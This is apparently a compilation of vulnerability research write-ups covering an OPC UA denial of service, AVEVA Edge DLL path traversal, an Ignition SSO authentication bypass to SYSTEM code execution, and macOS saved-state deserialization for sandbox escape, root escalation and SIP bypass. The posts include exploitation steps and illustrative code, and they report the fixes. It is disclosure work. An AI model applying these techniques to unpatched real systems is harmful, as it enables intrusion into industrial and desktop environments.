By trying to authenticate at the server using this certificate and including the other as an additional certificate, we can see that eventually we reach a timeout and the server will spin at 100% CPU usage.
You can see the exploit in action in the screen recording below.
Conclusion
OPC UA is often a central component between the IT and OT network of an organisation. Being able to reliably shut it down pre-authentication is a powerful primitive to have. This vulnerability shows yet again that validating certificates is an error prone operation, that should be handled with care.
This issue was fixed in version v1.7.7-549 and was given the CVE number CVE-2022-29862. Unified-Automation now uses the certificate stack that was constructed by OpenSSL for validation.
We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, we hope to return to a later edition!
This write-up is part 3 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in AVEVA Edge (CVE-2022-28688).
AVEVA Edge can be used to design Human Machine Interfaces (HMI). It allows for the designing of GUI applications, which can be programmed using a scripting language. The screenshot below shows one of the demo projects that come with the installer:
For this category it was acceptable to achieve code execution by opening a project file within the target on the contest laptop. So we tried various things to get code execution from opening a malicious project file. The application has quite some functionalities that might be useful for achieving our goal. Users can add custom controls to a project, it has a powerful scripting language and it will connect to OPC UA servers upon starting, for example. However, most attack surface will require the user to first make one or more clicks within the application; which was not allowed for the competition.
Communication drivers
AVEVA Edge also allows users to add communication drivers to a project. For example, it has drivers to allow communication with a Siemens S7 PLC over a serial interface. Drivers in this case are just DLL files that are loaded into the project.
Drivers are loaded whenever the user loads a project file in AVEVA Edge, which would mean that vulnerabilities here would be triggered without further user interaction.
AVEVA Edge projects consist of multiple files and directories, but the main project file that is also associated with the application is an INI-formatted file using the .app extension. The relevant section for communication drivers can be seen below:
[UsedDrivers]
Count=1
Task0=Driver ABCIP
When looking at the loading process with Procmon we see that drivers are loaded from C:\Program Files (x86)\AVEVA\AVEVA Edge 2020\Drv\:
Let's see what happens if we change the INI file to:
[UsedDrivers]
Count=1
Task0=Driver ..\Computest
Loading the new project shows us:
Interesting :)…
For those interested, the actual loading of the file happens in Bin/Studio.dll at address 0x100c16f1.
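The effect of the modified entry can be reproduced with a few lines of Python. This is only a model of the behaviour we observed: we assume that the driver name from the project file is appended to the driver directory and given a .dll extension, and the function names are made up for this example. It also shows the kind of check that would reject such a name.

```python
import configparser
import ntpath  # Windows path handling that works on any platform

DRIVER_DIR = r"C:\Program Files (x86)\AVEVA\AVEVA Edge 2020\Drv"


def driver_names(app_text: str) -> list:
    """Read the driver names from the [UsedDrivers] section of a project file."""
    parser = configparser.ConfigParser()
    parser.read_string(app_text)
    section = parser["UsedDrivers"]
    count = section.getint("Count")
    # Each value looks like "Driver <name>"; keep only the name.
    return [section[f"Task{i}"].split(" ", 1)[1] for i in range(count)]


def resolve_driver(name: str) -> str:
    """Assumed mapping from driver name to DLL path (hypothetical)."""
    return ntpath.normpath(ntpath.join(DRIVER_DIR, name + ".dll"))


def stays_in_driver_dir(name: str) -> bool:
    """True only if the resolved DLL is located directly in the driver directory."""
    return ntpath.dirname(resolve_driver(name)).lower() == DRIVER_DIR.lower()


project = r"""[UsedDrivers]
Count=1
Task0=Driver ..\Computest
"""

for name in driver_names(project):
    print(name, "->", resolve_driver(name), "allowed:", stays_in_driver_dir(name))
```

With the original entry (ABCIP) the resolved path stays inside the Drv directory, while ..\Computest resolves to a DLL one directory higher.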
Exploitation
From here exploitation is easy, we create a malicious DLL file:
You can see the exploit in action in the screen recording below.
Thoughts
Interestingly enough all binaries, including the drivers, that come with AVEVA Edge are digitally signed. However, it appears that signatures are not checked when loading libraries.
Customers who use AVEVA Edge should update to version 2020 R2 SP1 and apply HF 2020.2.00.40, which should mitigate this issue.
We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, we hope to return to a later edition!
This was added to the Xcode template to address a process injection vulnerability we reported!
In October 2021, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.
This research was also published at Black Hat USA 2022 and DEF CON 30.
Process injection
Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.
In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.
This was, in essence, the same security model as macOS until the introduction of SIP, also known as "rootless". This name doesn't mean that there is no root user anymore, but it is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present; this is an additional layer of permission checks on top of them. Certain sensitive files (e.g. the Mail.app database) and features (e.g. the webcam) are no longer accessible with only root privileges but require an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.
For example, using the following command we can see the entitlements of Mail.app:
This is what grants Mail.app the permission to read the SIP protected mail database, while other malware will not be able to read it.
Aside from entitlements, there are also the permissions handled by Transparency, Consent and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Downloads folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.
Of course, entitlements and TCC permissions would be useless if any process could just attach as a debugger to another process of the same user. If one application has access to the webcam, but the other doesn't, then one process could attach as a debugger to the other process and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.
Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example; there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many others are likely still undiscovered.
Aside from Apple's own code, these vulnerabilities could also occur in third-party software. It's quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Electron applications in particular are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.
More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we'll demonstrate in this post.
The saved state vulnerability
When shutting down a Mac, you are asked whether the currently open windows should be reopened the next time you log in. This is part of functionality called "saved state" or "persistent UI".
When reopening the windows, it can even restore new documents that were not yet saved in some applications.
It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When an application has been inactive for a while (has not been the focused application, not playing audio, etc.), then the system can tell it to save its state and terminate the process. macOS keeps showing a static image of the application's windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality.
When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.
Each time an application loses focus, it writes to the files:
The windows.plist file contains a list of all of the application's open windows. (And some other things that don't look like windows, such as the menu bar and the Dock menu.)
For example, a windows.plist for TextEdit.app could look like this:
The data.data file uses a custom binary format. It consists of a list of records; each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and an ID (NSWindowID) for the record from data.data it corresponds to.1
For example:
00000000 4e 53 43 52 31 30 30 30 00 00 00 01 00 00 01 b0 |NSCR1000........|
00000010 ec f2 26 b9 8b 06 c8 d0 41 5d 73 7a 0e cc 59 74 |..&.....A]sz..Yt|
00000020 89 ac 3d b3 b6 7a ab 1b bb f7 84 0c 05 57 4d 70 |..=..z.......WMp|
00000030 cb 55 7f ee 71 f8 8b bb d4 fd b0 c6 28 14 78 23 |.U..q.......(.x#|
00000040 ed 89 30 29 92 8c 80 bf 47 75 28 50 d7 1c 9a 8a |..0)....Gu(P....|
00000050 94 b4 d1 c1 5d 9e 1a e0 46 62 f5 16 76 f5 6f df |....]...Fb..v.o.|
00000060 43 a5 fa 7a dd d3 2f 25 43 04 ba e2 7c 59 f9 e8 |C..z../%C...|Y..|
00000070 a4 0e 11 5d 8e 86 16 f0 c5 1d ac fb 5c 71 fd 9d |...]........\q..|
00000080 81 90 c8 e7 2d 53 75 43 6d eb b6 aa c7 15 8b 1a |....-SuCm.......|
00000090 9c 58 8f 19 02 1a 73 99 ed 66 d1 91 8a 84 32 7f |.X....s..f....2.|
000000a0 1f 5a 1e e8 ae b3 39 a8 cf 6b 96 ef d8 7b d1 46 |.Z....9..k...{.F|
000000b0 0c e2 97 d5 db d4 9d eb d6 13 05 7d e0 4a 89 a4 |...........}.J..|
000000c0 d0 aa 40 16 81 fc b9 a5 f5 88 2b 70 cd 1a 48 94 |..@.......+p..H.|
000000d0 47 3d 4f 92 76 3a ee 34 79 05 3f 5d 68 57 7d b0 |G=O.v:.4y.?]hW}.|
000000e0 54 6f 80 4e 5b 3d 53 2a 6d 35 a3 c9 6c 96 5f a5 |To.N[=S*m5..l._.|
000000f0 06 ec 4c d3 51 b9 15 b8 29 f0 25 48 2b 6a 74 9f |..L.Q...).%H+jt.|
00000100 1a 5b 5e f1 14 db aa 8d 13 9c ef d6 f5 53 f1 49 |.[^..........S.I|
00000110 4d 78 5a 89 79 f8 bd 68 3f 51 a2 a4 04 ee d1 45 |MxZ.y..h?Q.....E|
00000120 65 ba c4 40 ad db e3 62 55 59 9a 29 46 2e 6c 07 |e..@...bUY.)F.l.|
00000130 34 68 e9 00 89 15 37 1c ff c8 a5 d8 7c 8d b2 f0 |4h....7.....|...|
00000140 4b c3 26 f9 91 f8 c4 2d 12 4a 09 ba 26 1d 00 13 |K.&....-.J..&...|
00000150 65 ac e7 66 80 c0 e2 55 ec 9a 8e 09 cb 39 26 d4 |e..f...U.....9&.|
00000160 c8 15 94 d8 2c 8b fa 79 5f 62 18 39 f0 a5 df 0b |....,..y_b.9....|
00000170 3d a4 5c bc 30 d5 2b cc 08 88 c8 49 d6 ab c0 e1 |=.\.0.+....I....|
00000180 c1 e5 41 eb 3e 2b 17 80 c4 01 64 3d 79 be 82 aa |..A.>+....d=y...|
00000190 3d 56 8d bb e5 7a ea 89 0f 4c dc 16 03 e9 2a d8 |=V...z...L....*.|
000001a0 c5 3e 25 ed c2 4b 65 da 8a d9 0d d9 23 92 fd 06 |.>%..Ke.....#...|
[...]
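To make the record structure more concrete, here is a minimal Python sketch that splits such a file into records. The field layout is an assumption inferred from the dump above: an 8-byte magic `NSCR1000`, a 4-byte big-endian window ID (matching NSWindowID) and a 4-byte big-endian length that covers the whole record including this 16-byte header. The encrypted payload is returned as-is; decrypting it with the NSDataKey is not shown.

```python
import struct

MAGIC = b"NSCR1000"
# Assumed header layout: magic, window ID, total record length (big-endian).
HEADER = struct.Struct(">8sII")

def iter_records(blob):
    """Yield (window_id, encrypted_payload) for each record in blob."""
    offset = 0
    while offset + HEADER.size <= len(blob):
        magic, window_id, length = HEADER.unpack_from(blob, offset)
        if magic != MAGIC:
            raise ValueError("unexpected magic at offset %d" % offset)
        if length < HEADER.size or offset + length > len(blob):
            raise ValueError("bad record length at offset %d" % offset)
        yield window_id, blob[offset + HEADER.size:offset + length]
        offset += length

# The first 16 bytes of the dump above, decoded with the assumed layout.
first_header = HEADER.unpack(bytes.fromhex("4e534352313030300000000100000" "1b0"))
```

Under these assumptions, the first record in the dump belongs to window ID 1 and is 0x1b0 (432) bytes long, which matches the point where the dump is cut off.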
Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start.
The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using "secure coding". To explain what that means, we'll first explain serialization vulnerabilities, in particular on macOS.
Serialized objects
Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in.
In many of those languages these features have led to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.
For Python pickle and Ruby Marshal.load, remote code execution is straightforward. In Java (ObjectInputStream.readObject) and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.
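As a small illustration of why this is straightforward in Python, the sketch below uses the documented `__reduce__` hook of pickle. The class name `Gadget` is made up for this example, and the callable is a harmless `int`; a real attack would pick something like a function that runs a shell command.

```python
import pickle

class Gadget:
    def __reduce__(self):
        # pickle stores (callable, args); the unpickler later calls
        # callable(*args) and uses the result as the "object".
        return (int, ("42",))

payload = pickle.dumps(Gadget())

# The receiving side never asked for an int, and Gadget does not even
# need to exist there: the callable chosen by the sender simply runs.
result = pickle.loads(payload)
```

The important point is that the call happens during deserialization itself, before the receiving code has any chance to check what it received.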
Objective-C serialization
In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.
How this works in practice is as follows. A class that implements NSCoding must include a method:
-(id)initWithCoder:(NSCoder*)coder;
In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.
Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:
A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.
This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object.
This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed and -decodeObjectOfClass:forKey: must be used instead.
That makes exploitable vulnerabilities significantly less likely, but they could still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary objects are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.
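The idea of checking the class before an object is created can be illustrated with Python's pickle, which allows overriding `Unpickler.find_class`. This is only an analogy for the concept, not a model of NSSecureCoding: the names `AllowListUnpickler` and `safe_loads` are made up for this sketch, and unlike NSSecureCoding it matches exact class names and does not admit subclasses.

```python
import io
import pickle
from collections import OrderedDict

class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that refuses any class not explicitly allowed."""

    def __init__(self, file, allowed):
        super().__init__(file)
        self._allowed = set(allowed)

    def find_class(self, module, name):
        # Called before any object of that class is constructed.
        if (module, name) not in self._allowed:
            raise pickle.UnpicklingError("%s.%s is not allowed" % (module, name))
        return super().find_class(module, name)

def safe_loads(data, allowed):
    return AllowListUnpickler(io.BytesIO(data), allowed).load()

data = pickle.dumps(OrderedDict(a=1))
accepted = safe_loads(data, {("collections", "OrderedDict")})
```

Calling `safe_loads(data, set())` on the same data raises `pickle.UnpicklingError` before any `OrderedDict` is constructed.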
In all of Apple's operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.
Creating a malicious serialized object
In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn't just upgrade this to secure coding, as this could break third-party applications.
To exploit this, we wanted a method for constructing a chain of objects that would allow us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641, Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn't use this.
By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object.
We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive.
Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated.
A binding can be created programmatically with -bind:toObject:withKeyPath:options:, which binds the property binding of the receiver to the keyPath of observable. A keypath is a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is by creating them as part of a XIB file in Xcode.
For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the "value" of a text field to the "name" keypath of a Person to create a field that shows (and can edit) the person's name.
In the XIB editor, this would be created as follows:
The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of "foo", it would first check if one of the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!
In this case we use it to call -draw on the next object.
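The accessor search described above can be modelled roughly as follows. This Python sketch only mirrors the four method names mentioned in the text; the real key-value coding rules contain more cases (such as direct instance variable access), and the names `resolve_key` and `ImageRep` are hypothetical.

```python
def resolve_key(obj, key):
    """Call the first matching zero-argument accessor for `key` on obj."""
    capitalized = key[0].upper() + key[1:]
    for name in ("get" + capitalized, key, "is" + capitalized, "_" + key):
        method = getattr(obj, name, None)
        if callable(method):
            # The method is invoked to obtain the "value", even if it is
            # not a property getter at all and returns nothing.
            return method()
    raise KeyError(key)

class ImageRep:
    def __init__(self):
        self.drawn = False

    def draw(self):
        # Not a getter: it has a side effect and returns None.
        self.drawn = True

rep = ImageRep()
value = resolve_key(rep, "draw")
```

After this call `rep.drawn` is true, even though nothing in the code asked for drawing: merely resolving the key "draw" was enough to invoke the method.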
The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:
By deserializing these two classes we can now call zero-argument methods and multiple argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, this is a very powerful primitive. We'll cover the rest of the chain we used in a future blog post.
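The second gadget can be modelled in the same spirit. The Python sketch below is a toy model of the behaviour described above, not the AppKit implementation: `CustomImageRepModel` and `Recorder` are made-up names, and the "selector" is simply a method name looked up at call time.

```python
class CustomImageRepModel:
    """Toy model: stores a target object and a method name from the archive."""

    def __init__(self, target, selector):
        self.target = target
        self.selector = selector

    def draw(self):
        # Invoke the attacker-chosen method on the attacker-chosen object,
        # passing this object itself as the first argument.
        return getattr(self.target, self.selector)(self)

class Recorder:
    def __init__(self):
        self.calls = []

    def anyMethod(self, sender):
        self.calls.append(sender)

recorder = Recorder()
image_rep = CustomImageRepModel(recorder, "anyMethod")
image_rep.draw()
```

Combined with a zero-argument call primitive that triggers `draw`, both the object and the method name come from attacker-controlled data.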
Exploitation
Sandbox escape
First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.
In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:
Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure why; it might have something to do with upgrading an application to a new version which is sandboxed.
Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC even accessing the Downloads, Documents, etc. folders requires user approval. If the application would open an open or save panel, it would be quite inconvenient if the user could only see the files that the application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.
As it is an XPC service with service type Application, it is launched separately for each app.
What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.
As it turns out, it reads its saved state from the location outside of the container, but with the application's bundle ID:
But, as we mentioned, if the app was ever open when the user shut down their computer, then this will be a symlink to the container path.
Thus, we can escape the sandbox in the following way:
Wait for the user to shut down while the app is open, if the symlink does not yet exist.
Write malicious data.data and windows.plist files inside the app's own container.
Open an NSOpenPanel or NSSavePanel.
The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.
This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService.
Privilege escalation
By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.
Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, "Install Command Line Developer Tools.app" and "Bootcamp Assistant.app" have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.
The exploitation steps are as follows:
Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it.
Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
Wait for the post-install script to run.
In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.
SIP filesystem bypass
Now that we have escaped the sandbox and elevated our privileges to root, we did want to bypass SIP as well. To do this, we looked around at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: "macOS Update Assistant.app" has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.
The exploitation for this is quite simple:
Create malicious windows.plist and data.data files for "macOS Update Assistant.app".
Launch "macOS Update Assistant.app".
When exempt from SIP's filesystem restrictions, we can read all files from protected locations, such as the user's Mail.app mailbox. We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.
Demo
We recorded the following video to demonstrate the different steps. It first shows that the application "Sandbox" is sandboxed, then it escapes its sandbox and launches "Privesc". This elevates privileges to root and launches "SIP Bypass". Finally, this opens a reverse shell that is exempt from SIP's filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):
The fix
Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659).
Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt-in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.
This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as "macOS Update Assistant.app" does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix; in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!
Nevertheless, if you write an Objective-C application, please make sure you implement -applicationSupportsSecureRestorableState: to return TRUE and adopt secure coding for all classes used for your saved states!
Conclusion
In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and bypass SIP's filesystem restrictions. We have demonstrated how we used insecure deserialization in the loading of an application's saved state to inject into any Cocoa process. This was addressed by Apple as CVE-2021-30873.
This write-up is part 2 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Remote Code Execution vulnerability in Inductive Automation Ignition, by using an authentication bypass (CVE-2022-35871).
Conformed! @daankeuper and @xnyhps from Computest Sector 7 (@sector7_nl) used a missing authentication for critical function vuln to execute code on Inductive Automation Ignition. They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O
The cause of this vulnerability was a weak authentication implementation when using Active Directory single sign-on. We combined this with intended(?) functionality that allowed us to execute Python code on the server (as SYSTEM).
Background
Inductive Automation Ignition is an application that was part of the "Control Server" category. Control servers are used to supervise and communicate with lower-level devices, such as PLCs. This makes them a critical element in any ICS network.
Ignition is organized in different projects, which are managed using a web interface. Each project needs a user source which determines the authentication and authorization for that project. Authentication can be internal, using a database, or based on Active Directory (which has some sub-options that determine how authorization is handled). The projects can then be used from Ignition Perspective, a desktop application which communicates with the Ignition server through the gateway API.
When one of the AD-based user sources is configured, it offers an option named "SSO Enabled".
To configure an AD based user source, the server needs to be configured with an AD account, the IP address of a domain controller and the Active Directory domain name. The AD account is used to set up an LDAP connection to the AD server for the application itself.
Vulnerability
Auth bypass
While looking at the decompiled Java code (Ignition/lib/core/gateway/gateway-api-8.1.16.jar) for how the SSO authentication is handled in the gateway API, we noticed that the function implementing SSO was a lot simpler than we expected.
protected AuthenticatedUser authenticateAdSso(AuthChallenge challenge) throws Exception {
    String ssoUname = (String) challenge.get(User.Username);
    String ssoDomain = (String) challenge.get(ADSSOAuthChallenge.ADDomain);
    if (StringUtils.isBlank(ssoUname)) {
        this.log.debug("SSO username is blank.");
        return null;
    }
    if (StringUtils.isBlank(ssoDomain)) {
        this.log.debugf("SSO domain is blank for user '%s'", new Object[] { ssoUname });
        return null;
    }
    if (ssoDomain.equalsIgnoreCase(this.domain)) {
        User existingUser = this.userSource.findSSOUser(ssoUname);
        if (existingUser != null)
            return (AuthenticatedUser) new BasicAuthenticatedUser(existingUser, new Date());
        this.log.debug(String.format("Existing user was not found for username '%s'", new Object[] { ssoUname }));
    } else {
        this.log.debug(String.format("SSO domains did not match! Compared '%s' and '%s'", new Object[] { this.domain, ssoDomain }));
    }
    return null;
}
This function receives an AuthChallenge object (essentially a JSON dictionary). It checks that it contains a key for the username and a key for the SSO domain. Then it compares the value for the SSO domain to the configured Active Directory domain name. If it matches, it looks up the username using LDAP and, if found, returns it as an AuthenticatedUser object.
There's no check here for a password, token, signature, or anything like that. The only data that needs to be submitted to the server is the username and the Active Directory domain name. In other words, the vulnerability here is that there is no SSO implementation at all! It's not even clear to us what type of SSO was intended to be used here, probably Kerberos?
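To make the consequence explicit, the logic of the decompiled function can be restated as a short Python sketch. This is a paraphrase for illustration only: the dictionary keys `username` and `domain`, the function name and the `known_users` set are hypothetical stand-ins for the challenge fields and the LDAP lookup.

```python
def authenticate_ad_sso(challenge, configured_domain, known_users):
    """Return the authenticated username, or None if rejected."""
    username = challenge.get("username", "")
    domain = challenge.get("domain", "")
    if not username.strip() or not domain.strip():
        return None
    if domain.lower() != configured_domain.lower():
        return None
    # Stand-in for the LDAP lookup: the user only has to exist.
    # Note what is absent: no password, ticket or signature is verified.
    return username if username in known_users else None

# Anyone who knows a username and the domain name is "authenticated".
forged = {"username": "Administrator", "domain": "CORP.EXAMPLE"}
session_user = authenticate_ad_sso(forged, "corp.example", {"Administrator"})
```

Every input to the decision is a value the client chooses itself, so the check confirms knowledge of two non-secret strings and nothing more.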
RCE
To go from an authenticated user to code execution, we used what we assume is intended functionality that allows us to evaluate Python on the server. There is a ScriptInvoke gateway API endpoint with an execute function. Authenticated users can submit Python code to this endpoint, which is executed on the server with the same privileges as the server (on Windows, this is SYSTEM). Ignition Designer offers the ability to execute scripts on the server in response to specific events or regular intervals. This does not appear to require any special role or permissions, so this design looks risky to us, but it does seem to function as designed.
Exploit
To exploit the auth bypass, the server needs to be configured using AD authentication with SSO enabled. To perform the attack, we need the following information:
The name of a project using this authentication method.
The name of an existing AD user.
The name of the AD domain.
It turns out that the first two were easy to obtain. There is an unauthenticated API endpoint on the admin interface returning the list of all projects:
http://<server IP>/data/perspective/projects
For the username, this simply had to be any existing AD user, regardless of permissions in AD or Ignition. So, we could just use "Administrator", as that user will always exist in AD.
This only leaves the AD domain name, which we didn't find a way to obtain automatically from Ignition. In practice, that value should be easy to obtain when attacking a company, especially if the attacker is already on the company's internal network. In most cases this would just be the company's primary domain name, or the value might leak in email headers, file metadata, etc.
Finally, we used a reverse shell implemented in Python to set up a connection back to our attacker machine.
Impact
Exploiting these vulnerabilities would grant us code execution on the machine hosting Ignition. This means that we could immediately manipulate or disrupt any process handled by or via this server. For example, we might be able to take over the communication with PLCs. In addition, the SYSTEM privileges would make it a fantastic starting point for further attacks on other parts of the ICS or IT network.
